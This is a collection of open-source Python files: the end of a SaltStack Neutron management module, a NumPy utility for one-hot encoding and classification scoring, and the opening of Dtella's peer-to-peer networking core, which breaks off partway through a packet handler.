return response['port']['id']
@_authenticate
def update_port(neutron_interface, port_id, **port_params):
'''
    Update an existing port in OpenStack
CLI Example:
.. code-block:: bash
salt '*' neutron.update_port name='new_port_name'
'''
neutron_interface.update_port(port_id, {'port': port_params})
@_authenticate
def delete_floatingip(neutron_interface, floating_ip_id):
'''
delete a floating IP
CLI Example:
.. code-block:: bash
salt '*' neutron.delete_floatingip openstack-floating-ip-id
'''
neutron_interface.delete_floatingip(floating_ip_id)
@_authenticate
def delete_security_group(neutron_interface, sg_id):
'''
delete a security group
CLI Example:
.. code-block:: bash
salt '*' neutron.delete_security_group openstack-security-group-id
'''
neutron_interface.delete_security_group(sg_id)
@_authenticate
def delete_security_group_rule(neutron_interface, rule):
'''
delete a security group rule. pass all rule params that match the rule
to be deleted
CLI Example:
.. code-block:: bash
salt '*' neutron.delete_security_group_rule direction='ingress'
ethertype='ipv4' security_group_id='openstack-security-group-id'
port_range_min=100 port_range_max=4096 protocol='tcp'
remote_group_id='default'
'''
sg_rules = neutron_interface.list_security_group_rules(
security_group_id=rule['security_group_id'])
for sg_rule in sg_rules['security_group_rules']:
sgr_id = sg_rule.pop('id')
if sg_rule == rule:
neutron_interface.delete_security_group_rule(sgr_id)
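# Note: the dict comparison above requires the caller to supply every
# attribute the API reports for the rule (direction, ethertype, protocol,
# port range, remote group, ...); a partial match deletes nothing.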
@_authenticate
def delete_subnet(neutron_interface, subnet_id):
'''
delete given subnet
CLI Example:
.. code-block:: bash
salt '*' neutron.delete_subnet openstack-subnet-id
'''
neutron_interface.delete_subnet(subnet_id)
@_authenticate
def delete_network(neutron_interface, network_id):
'''
delete given network
CLI Example:
.. code-block:: bash
salt '*' neutron.delete_network openstack-network-id
'''
neutron_interface.delete_network(network_id)
@_authenticate
def delete_router(neutron_interface, router_id):
'''
delete given router
CLI Example:
.. code-block:: bash
salt '*' neutron.delete_router openstack-router-id
'''
neutron_interface.delete_router(router_id)
|
CSSCorp/openstack-automation
|
file_root/_modules/neutron.py
|
Python
|
gpl-2.0
| 13,539
|
import numpy as np
from scipy.sparse import csr_matrix, coo_matrix
def save_sparse_csr(filename, array):
    np.savez(filename, data=array.data, indices=array.indices,
             indptr=array.indptr, shape=array.shape)
def load_sparse_csr(filename):
loader = np.load(filename)
    return csr_matrix((loader['data'], loader['indices'], loader['indptr']),
                      shape=loader['shape'])
def save_arr_assparse(filename, array):
return save_sparse_csr(filename, csr_matrix(array))
def load_sparse_asarr(filename):
return load_sparse_csr(filename).toarray()
def to_onehot(Y, vector_size):
Y_vec = []
    # Convert each index value in Y into a one-hot vector
for i in xrange(len(Y)):
Y_vec.append([])
for j in xrange(len(Y[0])):
y_vec = np.zeros(vector_size)
y_vec[Y[i][j]] = 1
Y_vec[-1].append(y_vec)
return np.array(Y_vec, dtype='int32')
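# Example (illustrative): to_onehot([[0, 2]], 3) returns
# array([[[1, 0, 0], [0, 0, 1]]], dtype=int32)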
def to_onehot_char(X, vector_size):
X_vec = np.zeros(X.shape + (vector_size,))
for i in xrange(X_vec.shape[0]):
for j in xrange(X_vec.shape[1]):
for k in xrange(X_vec.shape[2]):
                try:
                    X_vec[i, j, k, X[i, j, k]] = 1
                except IndexError:
                    print X_vec.shape, X.shape, (i, j, k), X[i, j, k]
                    raise
return X_vec
def onehot_to_idxarr(Y):
return Y.argmax(axis=len(Y.shape) - 1)
def confusion_matrix(y_pred, y_true, labels=None):
# Send only filtered y values.
y_pred, y_true = np.array(y_pred).flatten().squeeze(), np.array(y_true).flatten().squeeze()
if labels is None:
labels = list(set(y_true).union(set(y_pred)))
n_labels = len(labels)
print "[%s] labels = %s" % (n_labels, labels)
CM = coo_matrix((np.ones_like(y_true, dtype="int"), (y_true, y_pred)), shape=(n_labels, n_labels)).todense()
return CM
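# Example (illustrative): confusion_matrix([0, 1, 1], [0, 1, 0]) yields
# matrix([[1, 1], [0, 1]]), where rows index true labels and columns
# index predictions.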
def get_prf_scores(cm):
scores = dict()
TP = np.diag(cm)
    # Rows of cm index true labels and columns index predictions (see
    # confusion_matrix above), so column sums give TP+FP and row sums TP+FN.
    FP = np.squeeze(np.asarray(np.sum(cm, axis=0))) - TP
    FN = np.squeeze(np.asarray(np.sum(cm, axis=1))) - TP
scores["TP"] = TP
scores["FP"] = FP
scores["FN"] = FN
precision = TP * 1. / (TP + FP)
recall = TP * 1. / (TP + FN)
f1_score = 2*precision*recall / (precision + recall)
macro_f1 = np.mean(f1_score)
scores["precision"] = precision
scores["recall"] = recall
scores["f1_score"] = f1_score
scores["macro_f1"] = macro_f1
micro_precision = np.sum(TP) * 1. / np.sum(TP + FP)
micro_recall = np.sum(TP) * 1. / np.sum(TP + FN)
micro_f1 = 2*micro_precision*micro_recall / (micro_precision+micro_recall)
scores["micro_precision"] = micro_precision
scores["micro_recall"] = micro_recall
scores["micro_f1"] = micro_f1
return scores
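# Worked numbers (illustrative) for matrix([[1, 1], [0, 1]]) from the example
# above: TP=[1, 1], FP=[0, 1], FN=[1, 0], precision=[1.0, 0.5],
# recall=[0.5, 1.0], per-class f1=[2/3, 2/3], so macro_f1 == micro_f1 == 2/3.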
def get_eval_scores(y_pred, y_true, labels=None):
return get_prf_scores(confusion_matrix(y_pred, y_true, labels=labels))
|
napsternxg/DeepSequenceClassification
|
vector_utils.py
|
Python
|
gpl-2.0
| 2,879
|
"""
Dtella - Core P2P Module
Copyright (C) 2008 Dtella Labs (http://www.dtella.org)
Copyright (C) 2008 Paul Marks
$Id$
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
import struct
import heapq
import time
import random
import bisect
import socket
from binascii import hexlify
from twisted.internet.protocol import DatagramProtocol
from twisted.internet import reactor, defer
from twisted.python.runtime import seconds
import twisted.internet.error
import dtella.local_config as local
import dtella.common.crypto
from dtella.common.util import (RandSet, dcall_discard, dcall_timeleft,
randbytes, validateNick, word_wrap, md5,
parse_incoming_info, get_version_string,
parse_dtella_tag, CHECK, SSLHACK_filter_flags)
from dtella.common.ipv4 import Ad, SubnetMatcher
from dtella.common.log import LOG
from zope.interface import implements
from zope.interface.verify import verifyClass
from dtella.common.interfaces import IDtellaNickNode
# Check for some non-fatal but noteworthy conditions.
def doWarnings():
import twisted
from twisted.python import versions
if (twisted.version < versions.Version('twisted', 8, 0, 0)):
LOG.warning("You should get Twisted 8 or later. Previous versions "
"have some bugs that affect Dtella.")
try:
import dtella.bridge
except ImportError:
# Don't warn about GMP for clients, because verifying a signature
# is fast enough without it (~1ms on a Core2)
pass
else:
import Crypto.PublicKey
try:
import Crypto.PublicKey._fastmath
except ImportError:
LOG.warning("Your version of PyCrypto was compiled without "
"GMP (fastmath). Signing messages will be slower.")
doWarnings()
# Miscellaneous Exceptions
class BadPacketError(Exception):
pass
class BadTimingError(Exception):
pass
class BadBroadcast(Exception):
pass
class Reject(Exception):
pass
class NickError(Exception):
pass
class MessageCollisionError(Exception):
pass
# How many seconds our node will last without incoming pings
ONLINE_TIMEOUT = 30.0
# How many seconds our node will stay online without a DC client
NO_CLIENT_TIMEOUT = 60.0 * 5
# Reconnect time range. Currently 10sec .. 15min
RECONNECT_RANGE = (10, 60*15)
NODE_EXPIRE_EXTEND = 15.0
PKTNUM_BUF = 20
# Status Flags
PERSIST_BIT = 0x1
# Ping Flags
IWANT_BIT = 0x01
GOTACK_BIT = 0x02
REQ_BIT = 0x04
ACK_BIT = 0x08
NBLIST_BIT = 0x10
OFFLINE_BIT = 0x20
# Broadcast Flags
REJECT_BIT = 0x1
# Ack flags
ACK_REJECT_BIT = 0x1
# Sync Flags
TIMEDOUT_BIT = 0x1
# Chat Flags
SLASHME_BIT = 0x1
NOTICE_BIT = 0x2
# ConnectToMe Flags
USE_SSL_BIT = 0x1
# ACK Modes
ACK_PRIVATE = 1
ACK_BROADCAST = 2
# Bridge topic change
CHANGE_BIT = 0x1
# Bridge Kick flags
REJOIN_BIT = 0x1
# Bridge general flags
MODERATED_BIT = 0x1
# Init response codes
CODE_IP_OK = 0
CODE_IP_FOREIGN = 1
CODE_IP_BANNED = 2
##############################################################################
class NickManager(object):
def __init__(self, main):
self.main = main
self.nickmap = {} # {nick.lower() -> Node}
def getNickList(self):
return [n.nick for n in self.nickmap.itervalues()]
def lookupNick(self, nick):
# Might raise KeyError
return self.nickmap[nick.lower()]
def removeNode(self, n, reason):
try:
if self.nickmap[n.nick.lower()] is not n:
raise KeyError
except KeyError:
return
del self.nickmap[n.nick.lower()]
so = self.main.getStateObserver()
if so:
so.event_RemoveNick(n, reason)
# Clean up nick-specific stuff
if n.is_peer:
n.nickRemoved(self.main)
def addNode(self, n):
if not n.nick:
return
lnick = n.nick.lower()
if lnick in self.nickmap:
raise NickError("collision")
so = self.main.getStateObserver()
if so:
# Might raise NickError
so.event_AddNick(n)
so.event_UpdateInfo(n)
self.nickmap[lnick] = n
def setInfoInList(self, n, info):
# Set the info of the node, and synchronize the info with
# an observer if it changes.
if not n.setInfo(info):
# dcinfo hasn't changed, so there's nothing to send
return
# Look for this node in the nickmap
try:
if self.nickmap[n.nick.lower()] is not n:
raise KeyError
except KeyError:
return
# Push new dcinfo to dch/ircs
so = self.main.getStateObserver()
if so:
so.event_UpdateInfo(n)
##############################################################################
class PeerHandler(DatagramProtocol):
# Panic rate limit for broadcast traffic
CHOKE_RATE = 100000 # bytes per second
CHOKE_PERIOD = 5 # how many seconds to average over
def __init__(self, main):
self.main = main
self.remap_ip = None
self.choke_time = seconds() - self.CHOKE_PERIOD
self.choke_reported = seconds() - 999
# True iff we're shutting down after a socket failure.
self.stopping_protocol = False
def stopProtocol(self):
# If this is the final termination, don't do anything.
if not reactor.running:
return
self.main.showLoginStatus("UDP socket was reset.")
# Otherwise, our UDP port randomly died, so try reconnecting.
# Disable transmits during the shutdown.
self.stopping_protocol = True
try:
self.main.shutdown(reconnect='instant')
finally:
self.stopping_protocol = False
def getSocketState(self):
# Figure out the state of our UDP socket.
if self.stopping_protocol:
return 'dying'
elif not self.transport:
return 'dead'
elif hasattr(self.transport, "d"):
return 'dying'
else:
return 'alive'
def sendPacket(self, data, addr, broadcast=False):
# Send a packet, passing it through the encrypter
# returns False if an error occurs
if self.stopping_protocol:
# Still cleaning up after a socket asplosion.
return False
self.main.logPacket("%s -> %s:%d" % (data[:2], addr[0], addr[1]))
data = self.main.pk_enc.encrypt(data)
# For broadcast traffic, set a safety limit on data rate,
# in order to protect the physical network from DoS attacks.
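        # Illustrative numbers from the constants above: a 1000-byte
        # broadcast charges a 0.05 s penalty against a budget clamped to at
        # most CHOKE_PERIOD seconds, so bursts of up to CHOKE_RATE bytes are
        # absorbed before packets start being dropped.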
if broadcast:
now = seconds()
self.choke_time = max(self.choke_time, now - self.CHOKE_PERIOD)
penalty = (1.0 * len(data) *
self.CHOKE_PERIOD / self.CHOKE_RATE)
# Have we used up the buffer time?
if self.choke_time + penalty >= now:
# Tell the user what's going on, but only once every
# 10 seconds.
if self.choke_reported < now - 10:
self.main.showLoginStatus(
"!!! Dropping broadcast packets due to "
"excessive flood !!!")
self.choke_reported = now
# Don't send packet
return False
# Nibble something off the choke buffer
self.choke_time += penalty
self.main.logPacket(
"choke=%f" % (now - (self.choke_time+penalty)))
# Send the packet
try:
self.transport.write(data, addr)
except socket.error:
return False
except RuntimeError:
            # Work around the Twisted infinite recursion bug
return False
return True
def datagramReceived(self, rawdata, addr, altport=False):
ad = Ad().setAddrTuple(addr)
if not ad.port:
return
# This will remap a router's internal IP to its external IP,
# if the remapping is known.
if self.remap_ip and ad.ip == self.remap_ip[0]:
ad.orig_ip = ad.ip
ad.ip = self.remap_ip[1]
# Special handler for search results directly from DC
if rawdata[:4] == '$SR ':
dch = self.main.getOnlineDCH()
if dch and ad.auth('sb', self.main):
dch.pushSearchResult(rawdata)
return
try:
try:
data = self.main.pk_enc.decrypt(rawdata)
except ValueError, e:
raise BadPacketError("Decrypt Failed: " + str(e))
if len(data) < 2:
raise BadPacketError("Too Short")
kind = data[:2]
if not kind.isalpha():
raise BadPacketError("Kind not alphabetical")
if altport:
kind += "_alt"
self.main.logPacket("%s <- %s:%d" % (kind, addr[0], addr[1]))
# Make sure the sender's IP is permitted, but delay the check if
# it's an initialize packet.
if kind not in ('IQ', 'EC', 'IR', 'IC_alt'):
if not ad.auth('sbx', self.main):
raise BadPacketError("Invalid source IP")
try:
method = getattr(self, 'handlePacket_%s' % kind)
except AttributeError:
raise BadPacketError("Unknown kind: %s" % kind)
# arg1: Address the packet came from
# arg2: The unencrypted packet
method(ad, data)
except (BadPacketError, BadTimingError), e:
self.main.logPacket("Bad Packet/Timing: %s" % str(e))
def decodePacket(self, fmt, data):
if fmt[-1] == '+':
fmt = fmt[:-1]
size = struct.calcsize(fmt)
rest = (data[size:],)
data = data[:size]
else:
rest = ()
try:
parts = struct.unpack(fmt, data)
except struct.error:
raise BadPacketError("Can't decode packet")
return parts + rest
def decodeString1(self, data, factor=1):
try:
length, = struct.unpack('!B', data[:1])
except struct.error:
raise BadPacketError("Can't decode 1string")
length *= factor
if len(data) < 1+length:
raise BadPacketError("Bad 1string length")
return data[1:1+length], data[1+length:]
def decodeString2(self, data, max_len=1024):
try:
length, = struct.unpack('!H', data[:2])
except struct.error:
raise BadPacketError("Can't decode 2string")
if length > max_len or len(data) < 2+length:
raise BadPacketError("Bad 2string length")
return data[2:2+length], data[2+length:]
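    # Wire-format example for the two helpers above:
    # decodeString1('\x03abcXYZ') -> ('abc', 'XYZ'), and
    # decodeString2('\x00\x03abcXYZ') -> ('abc', 'XYZ'). The 'factor'
    # argument scales the length byte, e.g. factor=6 for 6-byte IP:Port lists.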
def decodeChunkList(self, fmt, data):
size = struct.calcsize(fmt)
try:
return [struct.unpack(fmt, data[i:i+size])
for i in range(0, len(data), size)]
except struct.error:
raise BadPacketError("Can't decode chunk list")
def decodeNodeList(self, data):
nbs, rest = self.decodeString1(data, 6)
nbs = self.decodeChunkList('!6s', nbs)
nbs = [ipp for ipp, in nbs
if Ad().setRawIPPort(ipp).auth('sx', self.main)]
return nbs, rest
def decodeNodeTimeList(self, data):
nbs, rest = self.decodeString1(data, 6+4)
nbs = [(ipp, age) for (ipp, age) in self.decodeChunkList('!6sI', nbs)
if Ad().setRawIPPort(ipp).auth('sx', self.main)]
return nbs, rest
def checkSource(self, src_ipp, ad, exempt_ip=False):
# Sometimes the source port number gets changed by NAT, but this
# ensures that the source IP address matches the reported one.
src_ad = Ad().setRawIPPort(src_ipp)
if exempt_ip:
kinds = 'sx'
else:
kinds = 's'
if not src_ad.auth(kinds, self.main):
raise BadPacketError("Invalid Source IP")
if not src_ad.auth('b', self.main):
raise BadPacketError("Source IP banned")
if src_ad.ip != ad.ip:
raise BadPacketError("Source IP mismatch")
osm = self.main.osm
if osm and src_ipp == osm.me.ipp:
raise BadPacketError("Packet came from myself!?")
self.main.state.refreshPeer(src_ad, 0)
return src_ad
def handleBroadcast(self, ad, data, check_cb, bridgey=False):
(kind, nb_ipp, hop, flags, src_ipp, rest
) = self.decodePacket('!2s6sBB6s+', data)
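        # Broadcast header layout, per the format string above: 2-byte kind,
        # 6-byte neighbor IP:Port, 1-byte hop count, 1-byte flags, 6-byte
        # origin IP:Port, then a kind-specific payload in 'rest'.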
osm = self.main.osm
if not osm:
raise BadTimingError("Not ready to route '%s' packet" % kind)
# Make sure nb_ipp agrees with the sender's IP
self.checkSource(nb_ipp, ad, exempt_ip=True)
# Make sure the src_ipp is valid.
# Any broadcast which might be from a bridge is 'bridgey'
src_ad = Ad().setRawIPPort(src_ipp)
if bridgey:
kinds = 'sbx'
else:
kinds = 'sb'
if not src_ad.auth(kinds, self.main):
raise BadPacketError("Invalid forwarded source IP")
# Make sure this came from one of my ping neighbors.
# This helps a little to prevent the injection of random broadcast
# traffic into the network.
try:
if not osm.pgm.pnbs[nb_ipp].got_ack:
raise KeyError
except KeyError:
raise BadTimingError("Broadcast packet not from a ping neighbor")
ack_flags = 0
# Check if we've seen this message before.
ack_key = osm.mrm.generateKey(data)
if osm.mrm.pokeMessage(ack_key, nb_ipp):
# Ack and skip the rest
self.sendAckPacket(nb_ipp, ACK_BROADCAST, ack_flags, ack_key)
return
# Get the source node object, if any
try:
src_n = osm.lookup_ipp[src_ipp]
except KeyError:
src_n = None
try:
# Filter all non-bridgey broadcasts from bridge nodes.
if not bridgey and self.isFromBridgeNode(src_n, src_ipp):
raise BadBroadcast("Bridge can't use " + kind)
# Callback the check_cb function
check_cb(src_n, src_ipp, rest)
except BadBroadcast, e:
self.main.logPacket("Bad Broadcast: %s" % str(e))
# Mark that we've seen this message, but don't forward it.
osm.mrm.newMessage(data, tries=0, nb_ipp=nb_ipp)
# Ack and skip the rest
self.sendAckPacket(nb_ipp, ACK_BROADCAST, ack_flags, ack_key)
return
except Reject:
# check_cb told us to reject this broadcast
if src_ipp == nb_ipp:
# If this is from a neighbor, just set the flag.
# We'll send the ack later.
ack_flags |= ACK_REJECT_BIT
elif not (flags & REJECT_BIT):
# Not from a neighbor, so send a reject packet immediately.
self.sendAckPacket(
src_ipp, ACK_BROADCAST, ACK_REJECT_BIT, ack_key)
# Set this flag to indicate to forwarded neighbors that we've
# rejected the message.
flags |= REJECT_BIT
if hop > 0:
# Start with the broadcast header
packet = osm.mrm.broadcastHeader(kind, src_ipp, hop-1, flags)
# Keep the rest of the message intact
packet.append(rest)
# Pass this message to MessageRoutingManager, so it will be
# forwarded to all of my neighbors.
osm.mrm.newMessage(''.join(packet), tries=2, nb_ipp=nb_ipp)
# Ack the neighbor
self.sendAckPacket(nb_ipp, ACK_BROADCAST, ack_flags, ack_key)
# Update the original sender's age in the peer cache
src_ad = Ad().setRawIPPort(src_ipp)
self.main.state.refreshPeer(src_ad, 0)
def handlePrivMsg(self, ad, data, cb):
# Common code for handling private messages (PM, CA, CP)
(kind, src_ipp, ack_key, src_nhash, dst_nhash, rest
) = self.decodePacket('!2s6s8s4s4s+', data)
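        # Private-message header layout, per the format string above: 2-byte
        # kind, 6-byte source IP:Port, 8-byte ack key, 4-byte source nick
        # hash, 4-byte destination nick hash, then the payload in 'rest'.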
# If we're not on the network, ignore it.
osm = self.main.osm
if not osm:
raise BadTimingError("Not ready to handle private message")
ack_flags = 0
try:
# Make sure src_ipp agrees with the sender's IP
self.checkSource(src_ipp, ad)
# Make sure we're ready to receive it
dch = self.main.getOnlineDCH()
if not dch:
raise Reject
try:
n = osm.lookup_ipp[src_ipp]
except KeyError:
raise Reject("Unknown node")
if src_nhash != n.nickHash():
raise Reject("Source nickhash mismatch")
if dst_nhash != osm.me.nickHash():
raise Reject("Dest nickhash mismatch")
if n.pokePMKey(ack_key):
# Haven't seen this message before, so handle it
cb(dch, n, rest)
except (BadPacketError, BadTimingError, Reject):
ack_flags |= ACK_REJECT_BIT
# Send acknowledgement
self.sendAckPacket(src_ipp, ACK_PRIVATE, ack_flags, ack_key)
def sendAckPacket(self, ipp, mode, flags, ack_key):
packet = ['AK']
packet.append(self.main.osm.me.ipp)
packet.append(struct.pack("!BB", mode, flags))
packet.append(ack_key)
ad = Ad().setRawIPPort(ipp)
self.main.ph.sendPacket(''.join(packet), ad.getAddrTuple())
def isOutdatedStatus(self, n, pktnum):
# This prevents a node's older status messages from taking
# precedence over newer messages.
if n is None:
# Node doesn't exist, can't be outdated
return False
if n.bridge_data:
# Don't allow updates for a bridge node
return True
if n.status_pktnum is None:
# Don't have a pktnum yet, can't be outdated
return False
if 0 < (n.status_pktnum - pktnum) % 0x100000000 < PKTNUM_BUF:
self.main.logPacket("Outdated Status")
return True
return False
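    # Wraparound example for the PKTNUM_BUF check above: with
    # status_pktnum=5 and incoming pktnum=0xFFFFFFFE,
    # (5 - 0xFFFFFFFE) % 0x100000000 == 7 < PKTNUM_BUF, so the incoming
    # status is treated as older even though the 32-bit counter wrapped.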
def isMyStatus(self, src_ipp, pktnum, sendfull):
# This makes corrections to any stray messages on the network that
# would have an adverse effect on my current state.
osm = self.main.osm
# If it's not for me, nothing's wrong.
if src_ipp != osm.me.ipp:
return False
# If it's old, ignore it.
if 0 < (osm.me.status_pktnum - pktnum) % 0x100000000 < PKTNUM_BUF:
self.main.logPacket("Outdated from-me packet")
return True
# If it's from my near future, then repair my packet number
if 0 < (pktnum - osm.me.status_pktnum) % 0x100000000 < 2 * PKTNUM_BUF:
osm.me.status_pktnum = pktnum
# If I'm syncd, retransmit my status
if osm.syncd:
self.main.logPacket("Reacting to an impersonated status")
osm.sendMyStatus(sendfull)
return True
def isFromBridgeNode(self, src_n, src_ipp):
# Return true if a source matches a known bridge node.
# This is not authenticated, so it should only be used to drop
# packets that a bridge shouldn't be sending.
osm = self.main.osm
return ((src_n and src_n.bridge_data) or
(osm and osm.bsm and src_ipp == osm.me.ipp))
def handlePacket_IQ(self, ad, data):
# Initialization Request; someone else is trying to get online
(kind, myip, port
) = self.decodePacket('!2s4sH', data)
if port == 0:
raise BadPacketError("Zero Port")
# The IPPort which is allegedly mine
my_ad = Ad().setRawIP(myip)
my_ad.port = self.main.state.udp_port
# src_ad is supposed to be the sender node's "true external IPPort"
src_ad = Ad()
src_ad.port = port
if ad.isPrivate() and my_ad.auth('sx', self.main):
# If the request came from a private IP address, but was sent
# toward a public IP address, then assume the sender node also
# has the same public IP address.
src_ad.ip = my_ad.ip
else:
src_ad.ip = ad.ip
if not src_ad.auth('sx', self.main):
ip_code = CODE_IP_FOREIGN
elif not src_ad.auth('b', self.main):
ip_code = CODE_IP_BANNED
else:
ip_code = CODE_IP_OK
osm = self.main.osm
state = self.main.state
# Provide a max of 48 addresses in a normal response,
# 8 addresses in a little cache response
IR_LEN = 48
IC_LEN = 8
# Lists of stuff
node_ipps = []
ir_nodes = []
ir_peercache = []
ic_peercache = []
if ip_code != CODE_IP_OK:
# For invalid IPs, send no neighbors, and a small peercache
# just so they can try for a second opinion.
IR_LEN = IC_LEN
elif osm and osm.syncd:
# Get a random sample of online nodes (plus me).
indices = xrange(len(osm.nodes) + 1)
try:
indices = random.sample(indices, IR_LEN)
except ValueError:
pass
# Remap the list of indices into a list of ipps.
# For the one out-of-bounds index, fill in 'me'.
def get_ipp(i):
try:
return osm.nodes[i].ipp
except IndexError:
return osm.me.ipp
node_ipps = [get_ipp(i) for i in indices]
elif osm:
# Not syncd yet, don't add any online nodes
pass
elif (self.main.reconnect_dcall and self.main.accept_IQ_trigger
and my_ad.auth('sx', self.main)):
# If we've recently failed to connect, then go online
# as the sole node on the network. Then report our node ipp
# so this other node can try to join us.
self.main.addMyIPReport(src_ad, my_ad)
self.main.startNodeSync(())
osm = self.main.osm
node_ipps = [osm.me.ipp]
# Get my own IPP (if I know it)
if osm:
my_ipp = osm.me.ipp
else:
my_ipp = None
now = time.time()
# For each node, add its ip:port, and age.
for ipp in node_ipps:
if ipp == my_ipp:
age = 0
else:
try:
age = max(now - state.peers[ipp], 0)
except KeyError:
# If the entry has expired from the cache
# (not very likely), then assume 1 hour
age = 60*60
ir_nodes.append(struct.pack('!6sI', ipp, int(age)))
# Convert node_ipps into a set, for O(1) lookups
node_ipps = set(node_ipps)
# Grab the youngest peers in our cache.
for when,ipp in state.getYoungestPeers(IR_LEN):
# Add packet data to the outlist
age = max(int(now - when), 0)
pc_entry = struct.pack('!6sI', ipp, int(age))
if (len(node_ipps) + len(ir_peercache) < IR_LEN and
ipp not in node_ipps):
ir_peercache.append(pc_entry)
if len(ic_peercache) < IC_LEN:
ic_peercache.append(pc_entry)
# === IC response packet ===
packet = ['IC']
# My IPPort
packet.append(my_ad.getRawIPPort())
# Add 4-byte sender's IP address
packet.append(src_ad.getRawIP())
# Add 1-byte flag: 1 if IP is invalid
packet.append(struct.pack('!B', ip_code))
# Add the peercache list
packet.append(struct.pack('!B', len(ic_peercache)))
packet.extend(ic_peercache)
# Send IC packet to alternate port, undo NAT remapping
if ad.orig_ip:
ad.ip = ad.orig_ip
self.sendPacket(''.join(packet), ad.getAddrTuple())
# === IR response packet ===
packet = ['IR']
# My IPPort
packet.append(my_ad.getRawIPPort())
# Add to packet: 4-byte sender's IP address
packet.append(src_ad.getRawIP())
# Add 1-byte flag: 1 if IP is invalid
packet.append(struct.pack('!B', ip_code))
# Add the node list
packet.append(struct.pack('!B', len(ir_nodes)))
packet.extend(ir_nodes)
# Now add the peercache list
packet.append(struct.pack('!B', len(ir_peercache)))
packet.extend(ir_peercache)
# Send IR packet to dtella port
self.sendPacket(''.join(packet), src_ad.getAddrTuple())
# Update the sender in my peer cache (if valid)
self.main.state.refreshPeer(src_ad, 0)
def handlePacket_IC_alt(self, ad, data):
# Initialization Peer Cache (Alt port)
(kind, src_ipp, myip, code, rest
) = self.decodePacket('!2s6s4sB+', data)
src_ad = Ad().setRawIPPort(src_ipp)
if ad.isPrivate():
if not src_ad.auth('sx', self.main):
raise BadPacketError("Invalid reported source IP")
else:
self.checkSource(src_ipp, ad, exempt_ip=True)
pc, rest = self.decodeNodeTimeList(rest)
if rest:
raise BadPacketError("Extra data")
if code not in (CODE_IP_OK, CODE_IP_FOREIGN, CODE_IP_BANNED):
raise BadPacketError("Bad Response Code")
if not self.main.icm:
raise BadTimingError("Not in initial connection mode")
self.main.icm.receivedInitResponse(src_ipp, myip, code, pc)
def handlePacket_IR(self, ad, data):
# Initialization Response
(kind, src_ipp, myip, code, rest
) = self.decodePacket('!2s6s4sB+', data)
src_ad = Ad().setRawIPPort(src_ipp)
if ad.isPrivate():
if not src_ad.auth('sx', self.main):
raise BadPacketError("Invalid reported source IP")
else:
self.checkSource(src_ipp, ad, exempt_ip=True)
# Node list, Peer Cache
nd, rest = self.decodeNodeTimeList(rest)
pc, rest = self.decodeNodeTimeList(rest)
if rest:
raise BadPacketError("Extra data")
if code not in (CODE_IP_OK, CODE_IP_FOREIGN, CODE_IP_BANNED):
raise BadPacketError("Bad Response Code")
if not self.main.icm:
raise BadTimingError("Not in initial connection mode")
self.main.icm.receivedInitResponse(src_ipp, myip, code, pc, nd)
def handlePacket_NS(self, ad, data):
# Broadcast: Node Status
osm = self.main.osm
def check_cb(src_n, src_ipp, rest):
(pktnum, expire, sesid, uptime, flags, rest
) = self.decodePacket('!IH4sIB+', rest)
nick, rest = self.decodeString1(rest)
info, rest = self.decodeString1(rest)
persist = bool(flags & PERSIST_BIT)
# 2011-08-21: allow 'rest' to be non-empty, in case we want to add
# new fields someday.
if len(rest) > 1024:
raise BadPacketError("Too much extra data")
if not (5 <= expire <= 30*60):
raise BadPacketError("Expire time out of range")
# Make sure this isn't about me
if self.isMyStatus(src_ipp, pktnum, sendfull=True):
raise BadBroadcast("Impersonating me")
if self.isOutdatedStatus(src_n, pktnum):
raise BadBroadcast("Outdated")
n = osm.refreshNodeStatus(
src_ipp, pktnum, expire, sesid, uptime, persist, nick, info)
# They had a nick, now they don't. This indicates a problem.
# Stop forwarding and notify the user.
if nick and not n.nick:
raise Reject
self.handleBroadcast(ad, data, check_cb)
def handlePacket_NH(self, ad, data):
# Broadcast: Node Status Hash (keep-alive)
osm = self.main.osm
def check_cb(src_n, src_ipp, rest):
(pktnum, expire, infohash
) = self.decodePacket('!IH4s', rest)
if not (5 <= expire <= 30*60):
raise BadPacketError("Expire time out of range")
# Make sure this isn't about me
if self.isMyStatus(src_ipp, pktnum, sendfull=True):
raise BadBroadcast("Impersonating me")
if self.isOutdatedStatus(src_n, pktnum):
raise BadBroadcast("Outdated")
if osm.syncd:
if src_n and src_n.infohash == infohash:
# We are syncd, and this node matches, so extend the
# expire timeout and keep forwarding.
src_n.status_pktnum = pktnum
osm.scheduleNodeExpire(src_n, expire + NODE_EXPIRE_EXTEND)
return
else:
# Syncd, and we don't recognize it
raise Reject
else:
if not (src_n and src_n.expire_dcall):
# Not syncd, don't know enough about this node yet,
# so just forward blindly.
return
elif src_n.infohash == infohash:
# We know about this node already, and the infohash
# matches, so extend timeout and keep forwarding
src_n.status_pktnum = pktnum
osm.scheduleNodeExpire(src_n, expire + NODE_EXPIRE_EXTEND)
return
else:
# Not syncd, but we know the infohash is wrong.
raise Reject
self.handleBroadcast(ad, data, check_cb)
def handlePacket_NX(self, ad, data):
# Broadcast: Node exiting
osm = self.main.osm
def check_cb(src_n, src_ipp, rest):
(sesid,
) = self.decodePacket('!4s', rest)
if osm.syncd:
if src_ipp == osm.me.ipp and sesid == osm.me.sesid:
# Yikes! Make me a new session id and rebroadcast it.
osm.me.sesid = randbytes(4)
osm.reorderNodesList()
osm.sendMyStatus()
osm.pgm.scheduleMakeNewLinks()
raise BadBroadcast("Tried to exit me")
if not src_n:
raise BadBroadcast("Node not online")
if sesid != src_n.sesid:
raise BadBroadcast("Wrong session ID")
elif not src_n:
# Not syncd, and haven't seen this node yet.
# Forward blindly
return
# Remove node
osm.nodeExited(src_n, "Received NX")
self.handleBroadcast(ad, data, check_cb)
def handlePacket_NF(self, ad, data):
# Broadcast: Node failure
osm = self.main.osm
def check_cb(src_n, src_ipp, rest):
(pktnum, sesid,
) = self.decodePacket('!I4s', rest)
# Make sure this isn't about me
if self.isMyStatus(src_ipp, pktnum, sendfull=False):
raise BadBroadcast("I'm not dead!")
if not (src_n and src_n.expire_dcall):
raise BadBroadcast("Nonexistent node")
if src_n.sesid != sesid:
raise BadBroadcast("Wrong session ID")
if self.isOutdatedStatus(src_n, pktnum):
raise BadBroadcast("Outdated")
# Reduce the expiration time. If that node isn't actually
# dead, it will rebroadcast a status update to correct it.
